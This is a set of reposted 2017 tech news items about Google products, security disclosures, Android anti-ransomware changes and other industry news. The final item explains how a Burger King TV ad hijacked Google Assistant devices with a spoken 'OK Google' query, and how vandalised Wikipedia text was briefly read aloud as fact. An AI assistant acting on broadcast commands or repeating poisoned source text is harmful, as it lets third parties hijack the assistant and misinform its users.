  15. Google's UI for Fuchsia Last year in August, Google was rumored to be working on a new operating system that could one day replace Android. Now, ArsTechnica has come across images that reveal the UI for the new OS and it appears that it won’t be based on Linux. Both Android and Chrome OS are based on Linux, but it seems that Fuchsia will be built on a new Google kernel, one that carries the name Magenta. The recent images reveal Google’s progress on the new OS, showing that a user-interface was added, together with a card-based design. The user interface carries the name Armadillo and will serve as “the default system UI for Fuchsia”, as it was built on Google’s Flutter SDK, which is used for developing cross-platform code that runs multiple OS like Android, iOS and even Fuchsia. This means that Armadillo can be compiled and ran on an Android device. Fuchsia OS is created for smartphones and tablets The images and the video by Kyle Bradshaw at Hotfix show that Fuchsia is designed for both smartphones and tablets, incorporating a card-based system for managing various apps. Users will be able to drag cards in split-screen or tabbed interface mode, while some suggestions similar to Google Now can also be provided. Armadillo UI for Fuchsia OS The images also seem to suggest that Fuchsia will allow users to run up to four apps at one, making it much easier to multitask on smartphones. In addition, Fuchsia resembles Android in some respects, tapping on an image would bring up a menu that’s very similar to Android’s Quick Settings. The report also mentions that there’s no real evidence that Fuchsia will actually replace Chrome OS or Android entirely. The move to another operating system surely implies a great deal of time and effort, while Fuchsia seems to be at the early stages of development now. Google is expected to host its annual Google I/O event this month and perhaps the company will shed some light into this project then. But the tech giant could also choose to stay silent and only reveal Fuchsia when more progress has been made, ArsTechnica seems to suggest that Fuchsia could see the light of day in 2020. Source
  16. Google Project Zero's security researchers have discovered another critical remote code execution (RCE) vulnerability in Microsoft’s Windows operating system, claiming that it is something truly bad. Tavis Ormandy announced during the weekend that he and another Project Zero researcher Natalie Silvanovich discovered "the worst Windows remote code [execution vulnerability] in recent memory. This is crazy bad. Report on the way." Ormandy did not provide any further details of the Windows RCE bug, as Google gives a 90-day security disclosure deadline to all software vendors to patch their products and disclose it to the public. This means the details of the new RCE vulnerability in Windows will likely be disclosed in 90 days from now even if Microsoft fails to patch the issue. However, Ormandy later revealed some details of the Windows RCE flaw, clarifying that: The vulnerability they claimed to have discovered works against default Windows installations. The attacker does not need to be on the same local area network (LAN) as the victim, which means vulnerable Windows computers can be hacked remotely. The attack is "wormable," capability to spread itself. Despite not even releasing any technical details on the RCE flaw, some IT professionals working for corporates have criticized the Google Project Zero researcher for making the existence of the vulnerability public, while Twitter's infosec community is happy with the work. This is not the first time when Google's security researchers have discovered flaws in Microsoft’s products. Most recently in February, Google researchers disclosed the details of an unpatched vulnerability impacting Microsoft's Edge and Internet Explorer browsers. Microsoft released a patch as part of its next Patch Tuesday but criticized Google for making all details public, exposing millions of its Windows users at risk of being hacked. Microsoft has not yet responded to the latest claims, but the company has its May 2017 Patch Tuesday scheduled tomorrow, May 9, so hopefully, it will include a security patch to resolve this issue. Source
  17. Everyone knows the Google Search Engine. It is only used for finding web pages on a specific topic, right? Wrong, there are many Google Search Tricks or Hacks that allows you to do much more than just search the web, do homework and assignments. I have prepared a list of the best Google Search Tricks that will open your mind to a world of endless possibilities. Learn how to also use Google for fun, get more refined searches and other cool stuff. Calculate Dinner Tip As far as Google Search Tricks go, this one is the most useful. When having dinner at your favorite restaurant, it is important to know what tip you should leave after. With this trick, you can quickly calculate the tip you should leave after dinner. To start the Tip Calculator, type tip calculator in the Google Search box and press Enter. Using the Tip Calculator is straight forward. In the Bill box, enter the total bill amount. Then, in the Tip % box, select the tip percentage and finally, if the bill will be shared between a number of people, in the Number of People box, select the number of people sharing the bill. Google Tip Calculator in action When all required information is entered, the Google Tip Calculator will display the Tip and Total amount you should pay. It will divide these amounts between the people sharing the bill as specified. Please note, it seems like there is no way to change the currency of this Tip Calculator. 🙁 Currency Converter This is one of the Google Search Tricks I use the most. To quickly convert between currencies, in the Google Search box, type the amount you want to convert, followed by the currency code, then to, and again followed by the currency code you want to convert to. For example, to convert from 25 Dollars to Rand, type 25 USD to ZAR in the search box and press Enter. If you are unsure about the currency codes to use, simply type currency converter in the search box and press Enter to open the Google Currency Converter. Google Currency Converter in action. Timer Boiling eggs? Want to perform a task in a certain time frame? Quickly set a timer in Google. Just type set timer followed by the time span you want in the Google Search box. For example, to set a timer for 10 minutes, simply type set timer 10 minutes in the search box and press Enter. Google Timer in action Exact Sunset and Sunrise time From all the Google Search Tricks this is the one you will use the least. Google can tell you the exact Sunset or Sunrise times. To see the exact Sunrise time, simply type sunrise followed by your country in the Google Search box. Or, to see the exact Sunset time, type sunset followed by your country in the search box. For example, to see the exact sunrise time in South Africa, type sunrise South Africa in the search box. Furthermore, you are not limited to your country or even limited to a country. For example, to see the exact sunrise for a specific city, type sunrise followed by the city and then followed by the country. Like, sunrise Johannesburg South Africa. Get exact Sunrise or Sunset time from Google Get the Definition of a Word Looking to define a particular word? Simply type define followed by the word you want to define in the Google Search box and press Enter. For example, type define programming to get the definition of programming. Get the Definition of a particular Word. Furthermore, you can click on the Translations, word-origin, and more definitions link to quickly translate the word or view the origin and extended definitions of the specified word. Google Calculator The humble Calculator needs no introduction. Performing calculation straight in Google is one of most useful Google Search Tricks available. To open the Google Calculator, type calculator in the Google Search box and press Enter. Also, perform quick calculations, by typing the calculation straight into the search box. For example, to get the square root of 888, type sqrt(888) in the search box and press Enter. Google Calculator in action Get the Weather To get the weather in a city, simply type weather followed by the city name in the Google Search box and press Enter. For example, weather Johannesburg. To further improve your search, try adding the country behind the city. Like, weather Johannesburg South Africa. Google Weather in action Search within a Particular Website The next few sections are all about refining your search. These are the oldest Google Search Engine Tricks, and some would consider them more important than the previously mentioned ones. Because of the huge amount of information available on Google, it is important that you learn how to refine your searches to find what you are looking for. You can limit your search to a specific website in Google by typing site: followed by the website’s URL you want to search and then the term you want to search for in the Google Search box. For example, to find all pages related to Complete Internet Repair on Rizonesoft, type site:rizonesoft.com Complete Internet Repair in the search box and press Enter. Search for all pages related to Complete Internet Repair on Rizonesoft This trick is especially useful when a website does not have its own build in Search Engine, but you need to find something specific to that website. Search by File Type Also, to search for a specific file type, simply type filetype: followed by the type of file and then the search term in the Google Search box. For example, type filetype:PDF Windows 10 Guide in the search box and press Enter, to find all the PDF Documents (Books) related to Windows 10. Go to File types indexable by Google to find out more about the file types you can search for. Search for Specific File Type in Google. Find Songs by Your Favorite Artist or Band Also, to quickly find songs by your favorite artist or band, just type Songs by followed by your favorite artist’s name in the Google Search box and press Enter. For example, type Songs by Linkin Park in the search box to view an extensive list of songs by Linkin Park. Click on a song to go to the respective song’s YouTube link. Search for Songs by Linkin Park in Google. Find Movies Apart from finding songs by an artist, you can also find specific movies using various filters. For example, type movies with, followed by your favorite actor into the Google Search box and press Enter. Like, movies with Keanu Reeves to display a list of all the movies starring Keanu Reeves. Also, type movies followed by a genre, for example Action or year. The genre and year can also be used together. For example, type movies action 2017 in the search box to get a list of the most popular action movies released and due for release in 2017. Action Movies 2017 on Google Pac-Man You can play Pac-Man on Google. It is a mini version of the game and was originally an animated logo for the game’s 30th anniversary on May 22, 2010. From all the Google Search Tricks, this one is my favorite. To start Pac-Man in Google, type pacman in the search box, press Enter and click on Click to Play. Google Pac-Man Article source Fun Things to do With Google Search or the “Hidden Google Tricks”
  18. Google and Microsoft are becoming fiercer rivals in education Microsoft’s new education push with Windows 10 S and the Surface Laptop is specifically aimed at slowing down the growth experienced by Google’s Chrome OS and Chromebooks, which have more or less conquered the education market in the last couple of years. And while Microsoft’s recent product unveilings were announced with much fanfare and received with enthusiasm by fans across the world, Google says it has absolutely no reason to worry about the strategy embraced by its Redmond-based rival. In fact, Google’s Prabhakar Raghavan, the vice-president in charge of G Suite, says the search company is pleased to see its approach being adopted by others, adding that the education market is the only one to benefit from the increasing competition here. “I'm happy to see a validation of the approach we've taken,” he was quoted as saying after Microsoft’s press event. “What educational institutions have demanded is simplicity. It's a real test tube for all of us, whether it's Microsoft or any of us, right.” Students are the ones building our future Prabhakar Raghavan continued with a message that was also reiterated by Microsoft’s Panos Panay during the May 2 press conference: technology shouldn’t stand in the way of students, as they are the ones who are trying to build the future. “Because kids do things in amazing ways where you or I would never expect. So here's one of the things we've learned in a study of kids as we were developing all our tools for classrooms, right. We would put a Chromebook in front of a kid, they would whip out their phone and write their essay. We said 'no no no, there's a keyboard there, you can use it,' and they still write the essay there,” he said. “They said 'we'll use the keyboard to touch up the formatting, but it'll be much faster here,' right. This is something we consistently learned when we looked at pre-teens ... these kids are really forerunners, the vanguards of human evolution, in some sense, and so it's great to see that some of the approaches we've taken, but I think the world is going to keep evolving and it's a scramble for us to keep up with what people are going to do.” Microsoft is trying to make its Windows 10 S devices as affordable as Chromebooks, so the cheapest models will be priced from $189. Furthermore, buyers will be allowed to upgrade devices to full Windows 10 Pro from the Windows Store. At the same time, Microsoft is also building its own Windows 10 S device called the Surface Laptop, but in this case the company is going for premium quality and price, giving more space to partners to dominate this market. Source
  19. How well do you know your Android device? Here are some of the hidden Android secret codes. Since most hidden menus are manufacturer specific, there’s no guarantee that they’ll work across all Android smartphones, but you can try them out nevertheless on your Samsung, HTC, Motorola, Sony and other devices. Be advised, though, that some of these can cause serious changes to your device’s configuration, so don’t play with something that you don’t fully understand. You can find more of these spread across the internet, and they’re usually very handy to have, even if just to show off your geekiness to your social circle. Update x1: More codes! Source : Redmondpie
  20. Earlier this week, Google unveiled a new version of Google Earth, an app that was considered amazing when it launched in 2001 but hadn’t really evolved in the same way that Google’s other technologies have. Now, thanks to this latest update, Google Earth is replete with 3D imagery, curated video content, and other features that will either make you want to book a trip to some far-flung part of the world or just appreciate the Earth right from your own latitude and longitude coordinates. Or maybe both. Here are five things to try with the new Google Earth, which runs in Chrome on desktop and on Android for mobile users: ENJOY 3D MAPS In earlier versions of Google Earth, certain buildings could be viewed in 3D, provided you checked off “3D Buildings” in the Layers portion of the app. But in the newest release of Google Earth, you can view, well, the whole world in 3D. When you search for a location, a clickable 2D/3D button appears on the lower right-hand corner of the screen, giving you a quick and easy way to look at your destination in another dimension. HAVE ANOTHER DOSE OF DAVID ATTENBOROUGH If Planet Earth II wasn’t enough to satisfy your love of nature, or you just can’t get enough of David Attenborough’s remarkably dignified narration of a lizard getting chased by hundreds of terrifying snakes, check out “Epic Hunts Caught on Camera.” Thanks to a partnership with BBC Earth, Google Earth now offers a series of short video clips narrated by Attenborough, which play in YouTube along the righthand side of the usual Earth view. If chimpanzees or underwater expeditions are more your thing, there’s also content from primatologist Jane Goodall and marine biologist Dr. Sylvia Earle. SEE HEMINGWAY’S HANGOUTS Ever want to see the places where Ernest Hemingway wrote his most important and influential works, ones that are second only to this blog post? Within the new “Voyage” tab in Google Earth, you can take a virtual tour of the Galapagos islands, the Samburu National Reserve in Kenya, and other UNESCO World Heritage sites; as well as cultural imprints like Hemingway’s hangouts, architecture by Zaha Hadid, and global perspectives on the different structures we call “home.” GET LOST Did you know that before Europeans came to North America, so-called Mississippians “had built a great city surrounded by huge earthen pyramids and a Stonehenge-like structure made of wood to track the movements of the stars”? And that it’s still visible in Illinois? Me neither, but the new Google Earth highlights this structure, along with eight other architectural feats, forgotten lands, or relics of an ancient world. Go to Google Earth -> Voyage -> History -> Lost Civilizations from Above to find them. FEEL LUCKY Google has ported its “I’m feeling lucky” button from its search engine to the new Google Earth, and it’s a glorious way to distract yourself at work or plan your next spontaneous trip. Source
  21. Google has removed a feature of the Android operating system that has been used in the past in ransomware attacks. Starting with Android O (8.0), set to be released in the fall of 2017, Google plans to deprecate the following window types: TYPE_SYSTEM_ALERT, TYPE_SYSTEM_ERROR, and TYPE_SYSTEM_OVERLAY. These are special "system" windows that are shown above any app on the user's screen. As you'd imagine, this is highly valued realty for ransomware developers, who often aim to obtain permissions to show content via these windows. Once they manage to obtain such permission, they use these windows to block the user's access to the rest of his phone and show ransom notes. Google's anti-ransomware efforts sabotaged by OEMs Starting with Android Marshmallow (6.0), Google reclassified the permissions of these system windows to the "Above dangerous" class. Previously, Android had only two permission classes: Normal and Dangerous. The difference between the two is that the Android OS itself can grant apps access to Normal permissions (adjusting timezone, access mundane sensors, etc.), while the user has to grant access to Dangerous permissions himself. For Above Dangerous permissions, requesting apps can provide instructions and the user has to go to an Android settings section, on his own, to grant access to the SYSTEM_ALERT_WINDOW permission, similar to how permissions are granted for Accessibility features and Device Administrators, also two other features often abused by ransomware. Dinesh Venkatesan, Principal Threat Analysis Engineer, says this didn't actually stop Android malware and ransomware authors, who just found various workarounds to get that permission. It also didn't help that certain Android phone manufacturers didn't move this permission in the Above Dangerous category in their modified Android distributions, nullifying Google's work. Google adds button to shut down abuse apps Now, with Android O, for which Google released a developer preview at the end of March, Google has taken this choice away from OEMs and has deprecated three types of system windows often used by ransomware authors. This means ransomware authors will need to find new ways of showing ransom notes and locking users' screens. And to make things even safer, Google is now allowing users to shut down apps that show other types of system windows. Starting with Android O, when ransomware or other malware attempts to lock users via a system window, the user can pull down the Notifications panel and shut down the app that's locking him out of his phone. New button to shut down apps with annoying system windows, at the bottom of the Notifications panel [via Symantec] "It should also be noted that while the new OS features should prove to be a good defense against ransomware variants that use system alert windows, they will not affect other ransomware threats such as those that constantly pop up the lock screen using user level windows," Venkatesan pointed out. Nonetheless, despite these improvements, Google's own Android Security Report showed that malware devs usually target older versions of the Android OS, where these improvements aren't supported. It also helps that there are more devices running Android 4.x and 5.x, less secure Android versions, compared with 6.x and 7.x, meaning malware devs don't have to go through all the trouble to bypass Google's new security features to make profits. So for the time being, ransomware is going to remain a problem on Android, but most likely for users of older OS versions. Last year, with the release of Android Nougat (7.0), Google also added anti-ransomware improvements, by restricting the ability of malware to "programmatically" change device PINs and passwords. Source
  22. Google Chrome may soon feature a built-in ad-blocker Rumor has it that Google is actually working on a built-in ad-blocker for Chrome and, to take things a step further, may even turn it on by default for everyone. This is a bit of a surprise, considering that Google's main source of money continues to be advertising. Wall Street Journal reports, however, that Google plans to offer its own ad-blocker in Chrome, in order to target a specific type of ads, namely the ones that are particularly annoying. The list includes pop-overs, autoplaying audio and video and more. For the most part, however, Google seems to seek to cater to that group of people that even if annoyed by ads, won't seek an ad-blocker, mostly because they don't have the technical know-how to get the job done or even know that such a thing exists. According to the report, Google isn't a big fan of the deals it has to make with third-party developers, like the people behind Adblock Plus, for instance, which require paying fees so they whitelist ads by companies such as Google. Basically, while Adblock Plus is one of the most popular of its type, it doesn't just whitelist "good" ads that don't bother you too much, it also takes money for allowing various ads to go around their filters. Potentially huge impact Implementing an ad-blocker directly into Chrome makes sense because the browser has almost half the market share. Taking this step would stop the growth of third-party options because users will stop looking for ways to block ads by installing additional extensions. Google wouldn't be killing ads altogether. After all, that's not its intention since the thick of its money comes from this side of business. It will, however, weed out the most annoying ones, which are the ones no one wants to encounter when visiting a web page. There is a problem, however, and it comes exactly from this particular combination - Google is an advertiser and giving the company control over what ads people can see might draw some criticism. After all, what's to stop Google from whitelisting all its ads and controlling who it blocks? Probably the company's moral compass, but that's another story. Source
  23. Reddit opens up about DMCAs In the past year, Reddit has received 3,294 DMCA takedown notices, most of which were thrown to the garbage can. According to Reddit's brand new transparency report regarding the number of piracy takedown notices, copyright holders asked the company to take down a lot of content. Out of the 3,294 requests it received, Reddit rejected 81% of them. Reddit is clearly one of the most visited websites in the world, and rightfully so. The community-oriented platform has subreddits dedicated to pretty much everything you can think of and more are posted every day. On occasion, however, some copyright infringing material will filter through and land on its pages, much like it happens on any platform that deals with this much traffic. The transparency report the company published shows just how much attention the site is getting from copyright holders. Most times, it seems, they're bothered over nothing. "For a request to be valid, it must comply with the statutory requirements outlined in the DMCA. Each DMCA takedown notice is reviewed carefully and, in circumstances where content is actually hosted on our servers, we assess whether the existence of the content on Reddit can fall under an exception, such as 'fair use' of the copyrighted material," Reddit explains. A different approach Given the number of rejected DMCA notices, it's clear that Reddit doesn't just blindly remove posts linking to copyrighted content. After all, the company has previously stated that it does not believe that links generally infringe copyright, something that certainly annoyed a lot of Hollywood execs. According to Reddit's report, out of the copyright removal requests it received, they were required to remove content from the site in 610 instances, making for a 19% approval rate. When compared to Google, that's nothing. In fact, Google is flooded with millions upon millions of requests every year and its automated process has reached a removal rate of 90%. Of course, comparing the two isn't much of a solution since there is such a big gap between the numbers, but it's still telling of the policy applied by each company. Source
  24. Google has acquired a significant piece of land in Nevada, near Reno and Tesla’s Gigafactory site, which will house a future data center, and could also prove host to a testing track for Waymo, the Alphabet-owned autonomous driving company. The purchase of the 1,210 acres in Nevada’s Tahoe Reno Industrial Center was reported by The Wall Street Journal on Monday, and follows the filing of documents detailing the transaction late last week. The purchase of land doesn’t mean Google is breaking ground on a new data center immediately; the report says there aren’t any plans in the books to start construction right away. But with increasing emphasis on its cloud-based business, it’s unlikely the company will sit idle on plans to build new data center infrastructure for long. More interesting might be the WSJ’s assertion that several people suggested Google might use the site as a future testing facility for Waymo’s autonomous vehicles. Nevada is in the process of passing legislation that could see it eventually allow self-driving tests with potentially fewer restrictions than are in place for testing in California, which might make it a good site for high-speed testing of vehicles, above the 35 MPH cap currently in place in Google’s home state. The theory that Google could use the land for testing of vehicles is based mostly on the regulatory conditions in Nevada, and its co-backing of the bill currently making its way through the legislative process, as well as the fact that the parcel of land is much larger than would be required for any single data center. Still, it’s an interesting possibility, and one that makes sense if Waymo wants to continue expanding its real-world testing capabilities. Source
  25. Burger King made waves today after it released a TV ad that purposely triggered the Google Assistant. The ad ends with a person saying "OK Google, what is the Whopper burger?"—a statement designed to trigger any Google Assistant devices like Android phones and Google Home to read aloud a description of the hamburger's ingredients. Google apparently wasn't happy with a third-party hijacking its voice command system to advertise fast food and has issued a server-side update to specifically disable Burger King's recording. Before the ad was disabled, the Google Assistant would verbally read a list of ingredients from Wikipedia. Of course the Internet immediately took to Wikipedia to vandalize the burger's entry page, with some edits claiming it contained "toenails" or "cyanide." Getting the Google Assistant to actually read one of these false edits was a tough task, since the Google Assistant gets its data from Google's search index, rather than a live query of Wikipedia. Still, according to The Verge, there was actually a brief period when the Google Assistant would read a false edit. Google's shutdown of the feature is interesting. The ad will still wake up a Google Home—the "Ok Google" phrase will light up the device, and the little lights on top will spin while it waits for the query to make a round trip to Google's servers. Google Home will no longer dutifully recite the burger's ingredient list, though. Apparently Google has made changes so that Burger King's specific recording of the phrase will no longer trigger a voice response. Instead, the Google Home just quietly goes back to sleep, without any response to the query. Having a live person ask "OK Google, what is the Whopper burger?"' will still trigger a voice response, though. Android phones are a little less susceptible to inadvertent hotword triggers thanks to a feature called "trusted voice," which aims to listen only to "Ok Google" triggers from the device owner. Android phones also don't have "Ok Google" enabled by default, giving Burger King a smaller target area. Google is working on a voice-based user authentication scheme for Google Home, which should shut down similar hotword hijacks in the future. Google Home would be the first Google voice product to detect and differentiate between multiple user voices on the fly—a task I think even some humans would have trouble with—so the feature is taking some time. The total time the ad triggered the Assistant was about three hours. Burger King is still on the hook to run the now-defanged ad on television, but we're sure the company already got its money's worth thanks to tech articles like this one. Burger King isn't the first brand to hijack a virtual assistant, though this may be the first intentional effort. Back in 2014, a commercial for the Xbox One featuring Breaking Bad alum Aaron Paul accidentally activated people's consoles. In the spot, Paul gave the "Xbox on" command to turn on his Xbox One. The only problem: that command turned on the consoles of everyone watching the commercial at home. Source 1 Source 2 (Xbox addendum)